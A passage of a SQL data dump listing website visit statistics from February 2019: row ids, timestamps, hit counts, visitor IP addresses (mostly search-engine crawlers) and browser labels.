29.168.133','other'),(392565,1551310442,1,1,0,0,'66.249.64.60','chrome'),(392566,1551310466,1,1,0,0,'8.29.198.26','other'),(392567,1551310941,1,1,0,0,'157.55.39.72','other'),(392568,1551311631,1,1,0,0,'66.249.64.31','chrome'),(392569,1551312203,1,1,0,0,'8.29.198.26','other'),(392570,1551312659,1,1,0,0,'157.55.39.225','other'),(392571,1551312743,1,1,0,0,'180.76.15.139','other'),(392572,1551312909,1,1,0,0,'66.249.64.62','chrome'),(392573,1551313060,1,1,0,0,'5.45.207.79','other'),(392574,1551313255,1,1,0,0,'5.45.207.19','other'),(392575,1551313396,1,1,0,0,'178.154.244.11','other'),(392576,1551314226,1,1,0,0,'95.108.213.4','other'),(392577,1551314303,1,1,0,0,'46.229.168.142','other'),(392578,1551314321,1,1,0,0,'66.249.64.29','chrome'),(392579,1551314415,2,2,0,0,'178.154.244.11','other'),(392580,1551314716,2,2,0,0,'5.45.207.19','other'),(392581,1551315139,1,1,0,0,'95.163.255.109','other'),(392582,1551315221,1,1,0,0,'34.216.30.220','other'),(392583,1551315324,1,1,0,0,'207.46.13.225','other'),(392584,1551315798,1,1,0,0,'40.77.167.110','other'),(392585,1551315818,1,1,0,0,'46.229.168.129','other'),(392586,1551316120,1,1,0,0,'66.249.64.62','chrome'),(392587,1551317463,1,1,0,0,'216.244.66.241','other'),(392588,1551317478,3,3,0,0,'66.249.64.31','chrome'),(392589,1551317672,1,1,0,0,'66.249.64.29','chrome'),(392590,1551318428,1,1,0,0,'40.77.167.71','other'),(392591,1551318584,1,1,0,0,'46.229.168.151','other'),(392592,1551319213,1,1,0,0,'216.244.66.241','other'),(392593,1551319364,1,1,0,0,'66.249.64.29','chrome'),(392594,1551319483,1,1,0,0,'66.249.64.30','chrome'),(392595,1551319828,1,1,0,0,'66.249.64.62','chrome'),(392596,1551320522,2,2,0,0,'35.162.234.105','chrome'),(392597,1551320955,1,1,0,0,'66.249.64.31','chrome'),(392598,1551320965,1,1,0,0,'46.211.46.113','chrome'),(392599,1551321172,1,1,0,0,'181.214.185.163','chrome'),(392600,1551321311,1,1,0,0,'8.29.198.27','other'),(392601,1551321689,1,1,0,0,'46.229.168.148','other'),(392602,1551321883,1,1,0,0,'18.204.141.49','firefox'),(392603,1551322163,1,1,0,0,'46.229.168.135','other'),(392604,1551323043,1,1,0,0,'8.29.198.27','other'),(392605,1551323482,1,1,0,0,'66.249.64.29','chrome'),(392606,1551323760,1,1,0,0,'40.77.167.71','other'),(392607,1551323848,1,1,0,0,'40.77.167.58','other'),(392608,1551324096,1,1,0,0,'46.229.168.139','other'),(392609,1551324232,2,2,0,0,'66.249.64.31','chrome'),(392610,1551324767,1,1,0,0,'40.77.167.71','other'),(392611,1551324840,1,1,0,0,'46.229.168.151','other'),(392612,1551325223,1,1,0,0,'66.249.64.31','chrome'),(392613,1551325414,2,2,0,0,'40.77.167.144','other'),(392614,1551325854,1,1,0,0,'66.249.64.29','chrome'),(392615,1551326986,1,1,0,0,'66.249.64.31','chrome'),(392616,1551327315,1,1,0,0,'46.229.168.148','other'),(392617,1551328165,1,1,0,0,'216.244.66.241','other'),(392618,1551328334,1,1,0,0,'46.229.168.139','other'),(392619,1551328655,1,1,0,0,'157.55.39.136','other'),(392620,1551328785,1,1,0,0,'157.55.39.106','other'),(392621,1551329433,2,2,0,0,'66.249.64.122','chrome'),(392622,1551329650,2,2,0,0,'5.45.207.19','other'),(392623,1551329790,1,1,0,0,'66.249.64.126','chrome'),(392624,1551329949,3,3,0,0,'178.154.244.11','other'),(392625,1551330082,2,2,0,0,'141.8.142.103','other'),(392626,1551330182,1,1,0,0,'87.250.224.47','other'),(392627,1551330214,1,1,0,0,'46.229.168.130','other'),(392628,1551330274,1,1,0,0,'46.229.168.144','other'),(392629,1551330564,1,1,0,0,'95.27.184.26','msie'),(392630,1551330702,1,1,0,0,'5.45.207.19','other'),(392631,1551330834,4,4,0,0,'5.45.207.79','other'),(392632,1551330975,1,1,0,0,'46.229.168.148','other'),(392633,1551331097,3,3,0,0,'141.8.142.103','other'),(392634,1551331339,1,1,0,0,'87.250.224.65','other'),(392635,1551331435,1,1,0,0,'37.188.11.183','chrome'),(392636,1551331601,4,4,0,0,'178.154.244.11','other'),(392637,1551331908,2,2,0,0,'66.249.64.124','chrome'),(392638,1551332078,3,3,0,0,'40.77.167.58','other'),(392639,1551332153,1,1,0,0,'8.29.198.27','other'),(392640,1551332209,1,1,0,0,'37.9.113.20','other'),(392641,1551332329,1,1,0,0,'5.45.207.79','other'),(392642,1551332565,1,1,0,0,'54.36.150.2','other'),(392643,1551332814,1,1,0,0,'54.36.150.63','other'),(392644,1551332834,1,1,0,0,'66.249.64.122','chrome'),(392645,1551332922,1,1,0,0,'54.36.148.83','other'),(392646,1551332991,1,1,0,0,'178.154.244.11','other'),(392647,1551333105,1,1,0,0,'54.36.150.57','other'),(392648,1551333140,1,1,0,0,'54.36.148.151','other'),(392649,1551333275,1,1,0,0,'216.244.66.241','other'),(392650,1551333501,1,1,0,0,'5.45.207.79','other'),(392651,1551333784,1,1,0,0,'54.36.149.52','other'),(392652,1551333870,2,2,0,0,'66.249.64.124','chrome'),(392653,1551333887,1,1,0,0,'8.29.198.26','other'),(392654,1551333982,2,2,0,0,'66.249.64.126','chrome'),(392655,1551334489,1,1,0,0,'185.220.101.3','other'),(392656,1551334817,3,3,0,0,'66.249.64.124','chrome'),(392657,1551334832,1,1,0,0,'40.77.167.58','other'),(392658,1551335010,1,1,0,0,'91.196.178.66','firefox'),(392659,1551335192,1,1,0,0,'54.36.150.29','other'),(392660,1551335325,1,1,0,0,'54.36.148.2','other'),(392661,1551335544,1,1,0,0,'54.36.148.131','other'),(392662,1551335734,1,1,0,0,'54.36.150.85','other'),(392663,1551335744,1,1,0,0,'91.196.178.171','chrome'),(392664,1551335809,2,2,0,0,'66.249.64.126','chrome'),(392665,1551335867,1,1,0,0,'157.55.39.136','other'),(392666,1551336041,2,2,0,0,'216.244.66.241','other'),(392667,1551336042,1,1,0,0,'46.229.168.133','other'),(392668,1551336209,1,1,0,0,'54.36.149.17','other'),(392669,1551336375,2,2,0,0,'66.249.64.124','chrome'),(392670,1551336732,1,1,0,0,'54.36.148.1','other'),(392671,1551336850,1,1,0,0,'54.36.149.89','other'),(392672,1551336900,1,1,0,0,'54.36.149.45','other'),(392673,1551336985,1,1,0,0,'54.36.150.38','other'),(392674,1551336992,1,1,0,0,'46.229.168.149','other'),(392675,1551337470,1,1,0,0,'91.196.178.94','chrome'),(392676,1551337626,1,1,0,0,'13.57.233.99','chrome'),(392677,1551337697,1,1,0,0,'178.95.255.39','firefox'),(392678,1551337965,3,3,0,0,'216.244.66.241','other'),(392679,1551338000,1,1,0,0,'157.55.39.136','other'),(392680,1551338173,1,1,0,0,'95.132.12.128','firefox'),(392681,1551338310,1,1,0,0,'54.36.149.47','other'),(392682,1551338419,1,1,0,0,'54.36.150.31','other'),(392683,1551338436,2,2,0,0,'130.180.218.206','chrome'),(392684,1551338550,1,1,0,0,'54.36.148.206','other'),(392685,1551338732,1,1,0,0,'91.196.178.94','chrome'),(392686,1551338918,1,1,0,0,'91.196.178.65','chrome'),(392687,1551338960,1,1,0,0,'52.53.201.78','chrome'),(392688,1551339429,1,1,0,0,'46.229.168.139','other'),(392689,1551339609,1,1,0,0,'54.36.148.0','other'),(392690,1551339619,1,1,0,0,'54.36.150.172','other'),(392691,1551339845,1,1,0,0,'54.36.148.110','other'),(392692,1551340091,1,1,0,0,'54.36.149.2','other'),(392693,1551340282,1,1,0,0,'91.196.177.46','firefox'),(392694,1551340411,1,1,0,0,'46.229.168.132','other'),(392695,1551340557,1,1,0,0,'54.36.150.145','other'),(392696,1551340709,1,1,0,0,'54.36.149.78','other'),(392697,1551340766,1,1,0,0,'40.77.167.195','other'),(392698,1551340885,1,1,0,0,'54.36.148.149','other'),(392699,1551340931,1,1,0,0,'46.229.168.149','other'),(392700,1551341215,1,1,0,0,'66.249.64.124','chrome'),(392701,1551341225,1,1,0,0,'216.244.66.241','other'),(392702,1551341427,1,1,0,0,'54.36.148.51','other'),(392703,1551341481,1,1,0,0,'54.36.148.5','other'),(392704,1551341539,1,1,0,0,'157.55.39.194','other'),(392705,1551341869,1,1,0,0,'54.36.148.166','other'),(392706,1551341875,1,1,0,0,'54.36.150.55','other'),(392707,1551342159,1,1,0,0,'54.36.148.158','other'),(392708,1551342260,1,1,0,0,'54.36.150.57','other'),(392709,1551342511,1,1,0,0,'54.36.150.191','other'),(392710,1551342630,1,1,0,0,'91.196.178.94','chrome'),(392711,1551342740,1,1,0,0,'66.249.64.126','chrome'),(392712,1551342869,1,1,0,0,'54.36.148.184','other'),(392713,1551342921,1,1,0,0,'54.36.149.40','other'),(392714,1551342994,1,1,0,0,'66.249.64.122','chrome'),(392715,1551342995,1,1,0,0,'8.29.198.25','other'),(392716,1551343011,1,1,0,0,'54.36.148.220','other'),(392717,1551343081,1,1,0,0,'54.36.150.86','other'),(392718,1551343324,1,1,0,0,'46.229.168.139','other'),(392719,1551343406,1,1,0,0,'157.55.39.194','other'),(392720,1551343532,2,2,0,0,'216.244.66.241','other'),(392721,1551343586,1,1,0,0,'40.77.167.50','other'),(392722,1551344003,1,1,0,0,'54.36.150.116','other'),(392723,1551344275,1,1,0,0,'54.36.149.41','other'),(392724,1551344633,1,1,0,0,'54.36.150.178','other'),(392725,1551344724,1,1,0,0,'8.29.198.27','other'),(392726,1551344759,1,1,0,0,'40.77.167.195','other'),(392727,1551345085,1,1,0,0,'54.36.150.166','other'),(392728,1551345275,1,1,0,0,'54.36.148.40','other'),(392729,1551345739,1,1,0,0,'91.196.178.94','chrome'),(392730,1551346050,1,1,0,0,'54.36.149.85','other'),(392731,1551346090,1,1,0,0,'95.132.8.212','chrome'),(392732,1551346149,1,1,0,0,'54.36.150.67','other'),(392733,1551346179,1,1,0,0,'66.249.64.124','chrome'),(392734,1551346335,1,1,0,0,'66.249.64.126','chrome'),(392735,1551346510,1,1,0,0,'54.36.148.199','other'),(392736,1551346579,1,1,0,0,'46.229.168.130','other'),(392737,1551346588,1,1,0,0,'54.36.150.32','other'),(392738,1551346960,1,1,0,0,'91.196.177.46','chrome'),(392739,1551347003,1,1,0,0,'46.101.33.27','other'),(392740,1551347062,1,1,0,0,'46.229.168.146','other'),(392741,1551347183,1,1,0,0,'46.166.186.210','other'),(392742,1551347272,1,1,0,0,'54.36.150.107','other'),(392743,1551347544,1,1,0,0,'91.196.178.169','chrome'),(392744,1551347965,1,1,0,0,'54.36.148.60','other'),(392745,1551347973,1,1,0,0,'134.73.199.154','chrome'),(392746,1551348006,1,1,0,0,'91.196.178.103','chrome'),(392747,1551348334,1,1,0,0,'46.229.168.142','other'),(392748,1551348442,3,3,0,0,'66.249.64.126','chrome'),(392749,1551349072,1,1,0,0,'176.105.217.22','chrome'),(392750,1551349186,1,1,0,0,'54.36.148.209','other'),(392751,1551349244,1,1,0,0,'54.36.150.17','other'),(392752,1551349367,2,2,0,0,'91.124.182.170','firefox'),(392753,1551349484,1,1,0,0,'91.196.178.66','chrome'),(392754,1551349878,1,1,0,0,'5.45.207.79','other'),(392755,1551349882,1,1,0,0,'178.154.244.11','other'),(392756,1551349895,1,1,0,0,'37.9.113.148','other'),(392757,1551350127,1,1,0,0,'54.36.148.226','other'),(392758,1551350311,1,1,0,0,'91.196.178.94','chrome'),(392759,1551350354,1,1,0,0,'141.8.142.103','other'),(392760,1551350372,1,1,0,0,'91.124.182.170','firefox'),(392761,1551350407,1,1,0,0,'54.36.150.42','other'),(392762,1551350524,1,1,0,0,'54.36.148.180','other'),(392763,1551350681,1,1,0,0,'91.196.177.46','firefox'),(392764,1551350727,1,1,0,0,'66.249.64.124','chrome'),(392765,1551351096,1,1,0,0,'87.250.224.47','other'),(392766,1551351132,1,1,0,0,'54.36.148.28','other'),(392767,1551351138,3,3,0,0,'66.249.64.122','chrome'),(392768,1551351254,1,1,0,0,'54.36.148.68','other'),(392769,1551351365,1,1,0,0,'91.124.182.170','firefox'),(392770,1551351369,2,2,0,0,'5.45.207.79','other'),(392771,1551351377,1,1,0,0,'54.36.149.70','other'),(392772,1551351456,1,1,0,0,'91.196.178.94','chrome'),(392773,1551351636,1,1,0,0,'54.36.148.70','other'),(392774,1551351774,1,1,0,0,'46.229.168.143','other'),(392775,1551351817,1,1,0,0,'54.36.149.82','other'),(392776,1551351840,1,1,0,0,'54.36.150.17','other'),(392777,1551351898,1,1,0,0,'216.244.66.241','other'),(392778,1551351999,1,1,0,0,'46.229.168.153','other'),(392779,1551352068,1,1,0,0,'178.154.244.11','other'),(392780,1551352132,1,1,0,0,'46.229.168.148','other'),(392781,1551352256,1,1,0,0,'54.36.148.111','other'),(392782,1551352297,1,1,0,0,'54.36.148.79','other'),(392783,1551352368,1,1,0,0,'5.45.207.19','other'),(392784,1551352421,1,1,0,0,'54.36.148.40','other'),(392785,1551352442,1,1,0,0,'54.36.150.55','other'),(392786,1551352506,1,1,0,0,'54.36.150.155','other'),(392787,1551352541,1,1,0,0,'46.229.168.146','other'),(392788,1551352757,1,1,0,0,'54.36.150.110','other'),(392789,1551352792,1,1,0,0,'46.229.168.133','other'),(392790,1551352888,1,1,0,0,'54.36.148.222','other'),(392791,1551352953,1,1,0,0,'54.36.150.8','other'),(392792,1551352964,1,1,0,0,'66.249.64.124','chrome'),(392793,1551353377,1,1,0,0,'91.124.182.170','chrome'),(392794,1551353548,1,1,0,0,'54.36.150.163','other'),(392795,1551353847,1,1,0,0,'8.29.198.27','other'),(392796,1551353880,1,1,0,0,'54.36.148.166','other'),(392797,1551354058,1,1,0,0,'66.249.64.124','chrome'),(392798,1551354125,2,2,0,0,'216.244.66.241','other'),(392799,1551354212,1,1,0,0,'91.196.177.227','chrome'),(392800,1551354260,1,1,0,0,'46.229.168.140','other'),(392801,1551354369,1,1,0,0,'178.92.19.126','chrome'),(392802,1551354434,1,1,0,0,'54.36.150.170','other'),(392803,1551354490,1,1,0,0,'54.36.149.56','other'),(392804,1551354508,2,2,0,0,'40.77.167.2','other'),(392805,1551354629,1,1,0,0,'54.36.148.171','other'),(392806,1551354839,1,1,0,0,'54.36.148.33','other'),(392807,1551354982,1,1,0,0,'82.145.210.186','other'),(392808,1551355259,1,1,0,0,'54.36.148.75','other'),(392809,1551355481,1,1,0,0,'54.36.148.158','other'),(392810,1551355593,1,1,0,0,'8.29.198.26','other'),(392811,1551355595,1,1,0,0,'62.205.134.182','msie'),(392812,1551355773,4,4,0,0,'40.77.167.2','other'),(392813,1551355777,2,2,0,0,'157.55.39.68','other'),(392814,1551355781,1,1,0,0,'46.229.168.145','other'),(392815,1551355782,7,7,0,0,'40.77.167.173','other'),(392816,1551355797,8,8,0,0,'40.77.167.211','other'),(392817,1551356167,1,1,0,0,'54.36.148.185','other'),(392818,1551356388,1,1,0,0,'54.36.150.102','other'),(392819,1551356533,1,1,0,0,'78.154.163.115','chrome'),(392820,1551356567,2,2,0,0,'178.92.136.49','chrome'),(392821,1551356682,1,1,0,0,'37.54.89.212','chrome'),(392822,1551356869,1,1,0,0,'91.196.178.94','chrome'),(392823,1551356951,1,1,0,0,'54.36.148.16','other'),(392824,1551357042,1,1,0,0,'54.36.148.125','other'),(392825,1551357110,1,1,0,0,'178.154.244.11','other'),(392826,1551357157,1,1,0,0,'95.108.213.4','other'),(392827,1551357220,1,1,0,0,'91.124.182.170','firefox'),(392828,1551357415,1,1,0,0,'54.36.150.156','other'),(392829,1551357593,1,1,0,0,'46.229.168.150','other'),(392830,1551357689,1,1,0,0,'107.178.41.163','other'),(392831,1551357698,1,1,0,0,'107.178.40.242','chrome'),(392832,1551357740,1,1,0,0,'54.36.148.229','other'),(392833,1551357769,1,1,0,0,'46.211.47.255','chrome'),(392834,1551357890,1,1,0,0,'66.249.64.122','chrome'),(392835,1551357941,1,1,0,0,'54.36.148.217','other'),(392836,1551357942,1,1,0,0,'91.196.178.94','chrome'),(392837,1551358025,1,1,0,0,'46.229.168.136','other'),(392838,1551358038,2,2,0,0,'178.154.244.11','other'),(392839,1551358116,1,1,0,0,'54.36.148.74','other'),(392840,1551358140,1,1,0,0,'54.36.150.113','other'),(392841,1551358171,1,1,0,0,'54.36.150.174','other'),(392842,1551358210,1,1,0,0,'46.229.168.138','other'),(392843,1551358230,1,1,0,0,'54.36.149.10','other'),(392844,1551358317,1,1,0,0,'54.36.148.243','other'),(392845,1551358457,2,2,0,0,'178.92.136.49','chrome'),(392846,1551358472,1,1,0,0,'5.45.207.19','other'),(392847,1551358696,1,1,0,0,'5.45.207.79','other'),(392848,1551358799,1,1,0,0,'180.76.15.23','other'),(392849,1551359308,1,1,0,0,'40.77.167.173','other'),(392850,1551359329,1,1,0,0,'54.36.150.124','other'),(392851,1551359343,1,1,0,0,'46.229.168.136','other'),(392852,1551359483,1,1,0,0,'54.36.148.240','other'),(392853,1551360003,2,2,0,0,'66.249.64.126','chrome'),(392854,1551360059,1,1,0,0,'54.36.149.101','other'),(392855,1551360218,1,1,0,0,'66.249.64.122','chrome'),(392856,1551360274,1,1,0,0,'207.46.13.180','other'),(392857,1551360315,1,1,0,0,'31.184.238.175','chrome'),(392858,1551360611,1,1,0,0,'54.36.150.106','other'),(392859,1551360787,1,1,0,0,'54.36.148.135','other'),(392860,1551360866,1,1,0,0,'194.29.62.160','chrome'),(392861,1551360924,2,2,0,0,'66.249.64.124','chrome'),(392862,1551360958,1,1,0,0,'54.36.150.81','other'),(392863,1551360967,1,1,0,0,'91.124.182.170','firefox'),(392864,1551361026,1,1,0,0,'54.36.148.126','other'),(392865,1551361069,1,1,0,0,'91.196.178.84','firefox'),(392866,1551361123,1,1,0,0,'66.249.64.126','chrome'),(392867,1551361153,1,1,0,0,'54.36.148.96','other'),(392868,1551361263,1,1,0,0,'91.196.178.94','chrome'),(392869,1551361290,1,1,0,0,'31.13.127.3','other'),(392870,1551361291,1,1,0,0,'31.13.127.13','other'),(392871,1551361320,1,1,0,0,'173.252.95.2','other'),(392872,1551361386,1,1,0,0,'95.133.34.107','chrome'),(392873,1551361608,1,1,0,0,'95.132.55.93','firefox'),(392874,1551361661,1,1,0,0,'54.36.150.60','other'),(392875,1551361680,1,1,0,0,'91.124.182.170','chrome'),(392876,1551361704,1,1,0,0,'91.196.178.66','firefox'),(392877,1551361949,1,1,0,0,'54.36.148.209','other'),(392878,1551361977,1,1,0,0,'91.196.178.84','firefox'),(392879,1551362159,1,1,0,0,'54.36.149.43','other'),(392880,1551362310,1,1,0,0,'173.252.87.19','other'),(392881,1551362582,1,1,0,0,'46.229.168.143','other'),(392882,1551362586,1,1,0,0,'91.124.182.170','firefox'),(392883,1551362721,1,1,0,0,'91.196.177.15','chrome'),(392884,1551362926,1,1,0,0,'54.36.148.209','other'),(392885,1551363074,1,1,0,0,'157.55.39.68','other'),(392886,1551363153,1,1,0,0,'54.36.150.109','other'),(392887,1551363198,2,2,0,0,'91.196.178.94','chrome'),(392888,1551363398,1,1,0,0,'66.249.64.124','chrome'),(392889,1551363405,1,1,0,0,'54.36.148.17','other'),(392890,1551363481,1,1,0,0,'46.229.168.132','other'),(392891,1551363507,1,1,0,0,'54.36.148.175','other'),(392892,1551363774,1,1,0,0,'37.9.113.148','other'),(392893,1551363791,1,1,0,0,'91.196.178.65','chrome'),(392894,1551363989,1,1,0,0,'95.108.213.50','other'),(392895,1551364245,1,1,0,0,'54.36.150.5','other'),(392896,1551364257,1,1,0,0,'54.36.149.99','other'),(392897,1551364273,1,1,0,0,'141.8.142.103','other'),(392898,1551364349,1,1,0,0,'46.211.149.19','chrome'),(392899,1551364354,1,1,0,0,'91.193.129.11','chrome'),(392900,1551364369,1,1,0,0,'178.154.244.49','other'),(392901,1551364543,1,1,0,0,'66.249.64.122','chrome'),(392902,1551364689,1,1,0,0,'8.29.198.27','other'),(392903,1551364724,1,1,0,0,'91.206.14.10','chrome'),(392904,1551365039,1,1,0,0,'207.46.13.134','other'),(392905,1551365312,1,1,0,0,'91.124.182.170','firefox'),(392906,1551365416,1,1,0,0,'54.36.150.58','other'),(392907,1551365468,1,1,0,0,'54.36.149.22','other'),(392908,1551365550,1,1,0,0,'216.244.66.241','other'),(392909,1551365562,2,2,0,0,'31.43.31.147','chrome'),(392910,1551365591,1,1,0,0,'91.196.178.94','chrome'),(392911,1551365820,1,1,0,0,'54.36.148.63','other'),(392912,1551365976,1,1,0,0,'141.8.142.103','other'),(392913,1551366056,1,1,0,0,'54.36.150.188','other'),(392914,1551366255,1,1,0,0,'54.36.150.56','other'),(392915,1551366444,1,1,0,0,'8.29.198.26','other'),(392916,1551366490,1,1,0,0,'207.46.13.147','other'),(392917,1551366864,1,1,0,0,'54.36.149.92','other'),(392918,1551366918,1,1,0,0,'66.249.64.124','chrome'),(392919,1551366938,1,1,0,0,'173.193.191.200','firefox'),(392920,1551367364,1,1,0,0,'54.36.148.187','other'),(392921,1551367379,1,1,0,0,'54.36.148.226','other'),(392922,1551367593,1,1,0,0,'54.36.150.182','other'),(392923,1551367753,1,1,0,0,'54.36.148.134','other'),(392924,1551367830,1,1,0,0,'54.36.148.83','other'),(392925,1551367895,1,1,0,0,'54.36.148.118','other'),(392926,1551368194,1,1,0,0,'54.36.150.37','other'),(392927,1551368199,1,1,0,0,'66.249.64.126','chrome'),(392928,1551368200,1,1,0,0,'178.154.171.17','other'),(392929,1551368360,1,1,0,0,'66.249.64.124','chrome'),(392930,1551368481,1,1,0,0,'54.36.148.62','other'),(392931,1551368666,1,1,0,0,'46.229.168.148','other'),(392932,1551368739,1,1,0,0,'46.229.168.139','other'),(392933,1551368849,1,1,0,0,'54.36.148.144','other'),(392934,1551368996,1,1,0,0,'54.36.148.104','other'),(392935,1551369218,1,1,0,0,'82.145.211.99','other'),(392936,1551369461,1,1,0,0,'207.46.13.147','other'),(392937,1551369486,1,1,0,0,'54.36.149.32','other'),(392938,1551369592,1,1,0,0,'213.180.203.61','other'),(392939,1551369767,1,1,0,0,'82.145.211.212','other'),(392940,1551369799,1,1,0,0,'54.36.148.99','other'),(392941,1551369915,1,1,0,0,'54.36.150.4','other'),(392942,1551369956,1,1,0,0,'54.36.150.40','other'),(392943,1551370064,2,2,0,0,'66.249.64.126','chrome'),(392944,1551370215,1,1,0,0,'54.36.148.59','other'),(392945,1551370485,1,1,0,0,'54.36.148.229','other'),(392946,1551370517,1,1,0,0,'91.196.178.188','chrome'),(392947,1551370569,1,1,0,0,'46.229.168.138','other'),(392948,1551370779,1,1,0,0,'46.211.24.133','chrome'),(392949,1551370931,1,1,0,0,'87.250.224.107','other'),(392950,1551370934,1,1,0,0,'5.255.253.25','other'),(392951,1551371386,1,1,0,0,'54.36.150.149','other'),(392952,1551371433,1,1,0,0,'54.36.149.61','other'),(392953,1551371490,1,1,0,0,'178.154.244.11','other'),(392954,1551371493,1,1,0,0,'213.180.203.53','other'),(392955,1551371536,1,1,0,0,'54.36.148.103','other'),(392956,1551371580,1,1,0,0,'141.8.132.16','other'),(392957,1551371619,1,1,0,0,'141.8.142.103','other'),(392958,1551371700,1,1,0,0,'95.108.213.50','other'),(392959,1551371716,1,1,0,0,'66.249.64.126','chrome'),(392960,1551371731,1,1,0,0,'107.167.108.195','other'),(392961,1551371741,1,1,0,0,'107.167.106.69','other'),(392962,1551371845,1,1,0,0,'54.36.148.227','other'),(392963,1551371846,1,1,0,0,'87.250.224.99','other'),(392964,1551371856,2,2,0,0,'46.211.24.133','chrome'),(392965,1551371871,1,1,0,0,'141.8.142.81','other'),(392966,1551371889,1,1,0,0,'37.9.113.148','other'),(392967,1551371896,2,2,0,0,'87.250.224.64','other'),(392968,1551371914,2,2,0,0,'141.8.183.11','other'),(392969,1551371970,1,1,0,0,'95.108.181.94','other'),(392970,1551372134,1,1,0,0,'40.77.167.120','other'),(392971,1551372436,1,1,0,0,'54.36.148.155','other'),(392972,1551372509,1,1,0,0,'54.36.150.49','other'),(392973,1551372569,2,2,0,0,'87.250.224.65','other'),(392974,1551372595,1,1,0,0,'54.36.150.143','other'),(392975,1551372730,1,1,0,0,'87.250.224.107','other'),(392976,1551372770,1,1,0,0,'46.211.24.133','chrome'),(392977,1551372780,1,1,0,0,'141.8.132.16','other'),(392978,1551372783,1,1,0,0,'141.8.142.144','other'),(392979,1551372809,1,1,0,0,'54.36.148.64','other'),(392980,1551372927,1,1,0,0,'207.46.13.134','other'),(392981,1551372963,1,1,0,0,'54.36.150.47','other'),(392982,1551373041,2,2,0,0,'141.8.183.11','other'),(392983,1551373137,2,2,0,0,'37.9.113.20','other'),(392984,1551373260,1,1,0,0,'93.158.166.7','other'),(392985,1551373464,1,1,0,0,'216.244.66.241','other'),(392986,1551373483,1,1,0,0,'54.36.148.118','other'),(392987,1551373638,1,1,0,0,'141.8.142.191','other'),(392988,1551373685,1,1,0,0,'5.45.207.79','other'),(392989,1551373736,1,1,0,0,'141.8.142.38','other'),(392990,1551373948,1,1,0,0,'54.36.150.70','other'),(392991,1551374081,1,1,0,0,'141.8.183.22','other'),(392992,1551374120,1,1,0,0,'213.180.203.61','other'),(392993,1551374301,1,1,0,0,'95.108.181.54','other'),(392994,1551374354,1,1,0,0,'54.36.148.84','other'),(392995,1551374391,1,1,0,0,'66.249.64.126','chrome'),(392996,1551374550,1,1,0,0,'87.250.224.99','other'),(392997,1551374654,1,1,0,0,'37.9.113.20','other'),(392998,1551374697,1,1,0,0,'40.77.167.120','other'),(392999,1551374789,1,1,0,0,'54.36.148.98','other'),(393000,1551374795,1,1,0,0,'207.46.13.134','other'),(393001,1551374922,1,1,0,0,'46.229.168.149','other'),(393002,1551375190,1,1,0,0,'54.36.148.156','other'),(393003,1551375314,1,1,0,0,'54.36.150.64','other'),(393004,1551375499,1,1,0,0,'46.229.168.129','other'),(393005,1551375519,1,1,0,0,'8.29.198.25','other'),(393006,1551375621,1,1,0,0,'54.36.149.100','other'),(393007,1551375802,1,1,0,0,'54.36.148.110','other'),(393008,1551375887,1,1,0,0,'216.244.66.241','other'),(393009,1551375896,1,1,0,0,'141.8.142.191','other'),(393010,1551375983,1,1,0,0,'66.249.64.122','chrome'),(393011,1551376172,1,1,0,0,'54.36.149.69','other'),(393012,1551376494,1,1,0,0,'54.36.150.59','other'),(393013,1551376604,1,1,0,0,'54.36.150.177','other'),(393014,1551377117,1,1,0,0,'54.36.148.172','other'),(393015,1551377267,1,1,0,0,'66.249.64.126','chrome'),(393016,1551377274,1,1,0,0,'8.29.198.27','other'),(393017,1551377296,1,1,0,0,'91.196.178.188','chrome'),(393018,1551377309,1,1,0,0,'66.249.64.124','chrome'),(393019,1551377436,1,1,0,0,'54.36.148.19','other'),(393020,1551377439,1,1,0,0,'54.36.150.128','other'),(393021,1551377750,1,1,0,0,'82.145.209.161','other'),(393022,1551377967,1,1,0,0,'5.188.210.65','chrome'),(393023,1551378306,1,1,0,0,'180.76.15.18','other'),(393024,1551378572,1,1,0,0,'54.36.150.63','other'),(393025,1551378604,1,1,0,0,'54.36.149.23','other'),(393026,1551378612,1,1,0,0,'194.146.139.101','chrome'),(393027,1551379039,2,2,0,0,'66.249.64.122','chrome'),(393028,1551379198,1,1,0,0,'54.36.148.125','other'),(393029,1551379200,1,1,0,0,'54.36.148.113','other'),(393030,1551379435,1,1,0,0,'54.36.150.123','other'),(393031,1551379762,1,1,0,0,'82.145.208.63','other'),(393032,1551379918,1,1,0,0,'66.249.64.124','chrome'),(393033,1551380058,1,1,0,0,'54.36.148.80','other'),(393034,1551380305,1,1,0,0,'180.76.15.6','other'),(393035,1551380347,1,1,0,0,'54.36.150.132','other'),(393036,1551380578,1,1,0,0,'54.36.149.67','other'),(393037,1551380582,1,1,0,0,'46.211.131.148','chrome'),(393038,1551380720,1,1,0,0,'54.36.149.100','other'),(393039,1551380944,1,1,0,0,'66.249.64.124','chrome'),(393040,1551381072,1,1,0,0,'216.244.66.241','other'),(393041,1551381159,3,3,0,0,'91.196.178.132','chrome'),(393042,1551381161,1,1,0,0,'207.46.13.93','other'),(393043,1551381347,1,1,0,0,'54.36.148.209','other'),(393044,1551381403,1,1,0,0,'54.36.150.52','other'),(393045,1551381466,1,1,0,0,'54.36.148.180','other'),(393046,1551381646,1,1,0,0,'54.36.149.86','other'),(393047,1551381674,1,1,0,0,'54.36.149.64','other'),(393048,1551381824,1,1,0,0,'54.36.149.49','other'),(393049,1551382793,1,1,0,0,'40.77.167.93','other'),(393050,1551382842,1,1,0,0,'54.36.150.130','other'),(393051,1551382897,1,1,0,0,'54.36.148.197','other'),(393052,1551382903,1,1,0,0,'54.36.150.22','other'),(393053,1551382923,1,1,0,0,'188.163.5.20','chrome'),(393054,1551382958,1,1,0,0,'54.36.149.62','other'),(393055,1551382995,1,1,0,0,'178.154.244.11','other'),(393056,1551383015,2,2,0,0,'207.46.13.218','other'),(393057,1551383516,2,2,0,0,'66.249.64.124','chrome'),(393058,1551383794,1,1,0,0,'54.36.150.149','other'),(393059,1551383812,1,1,0,0,'216.244.66.241','other'),(393060,1551383913,1,1,0,0,'37.53.110.17','firefox'),(393061,1551383916,1,1,0,0,'54.36.148.111','other'),(393062,1551384083,1,1,0,0,'54.36.148.183','other'),(393063,1551384437,1,1,0,0,'46.229.168.130','other'),(393064,1551384627,1,1,0,0,'54.36.148.151','other'),(393065,1551384639,1,1,0,0,'46.229.168.149','other'),(393066,1551384784,1,1,0,0,'54.36.150.93','other'),(393067,1551384975,1,1,0,0,'54.36.150.92','other'),(393068,1551384994,1,1,0,0,'54.36.149.98','other'),(393069,1551385131,1,1,0,0,'54.36.148.50','other'),(393070,1551385255,1,1,0,0,'54.36.148.185','other'),(393071,1551385370,1,1,0,0,'40.77.167.205','other'),(393072,1551385575,1,1,0,0,'54.36.150.75',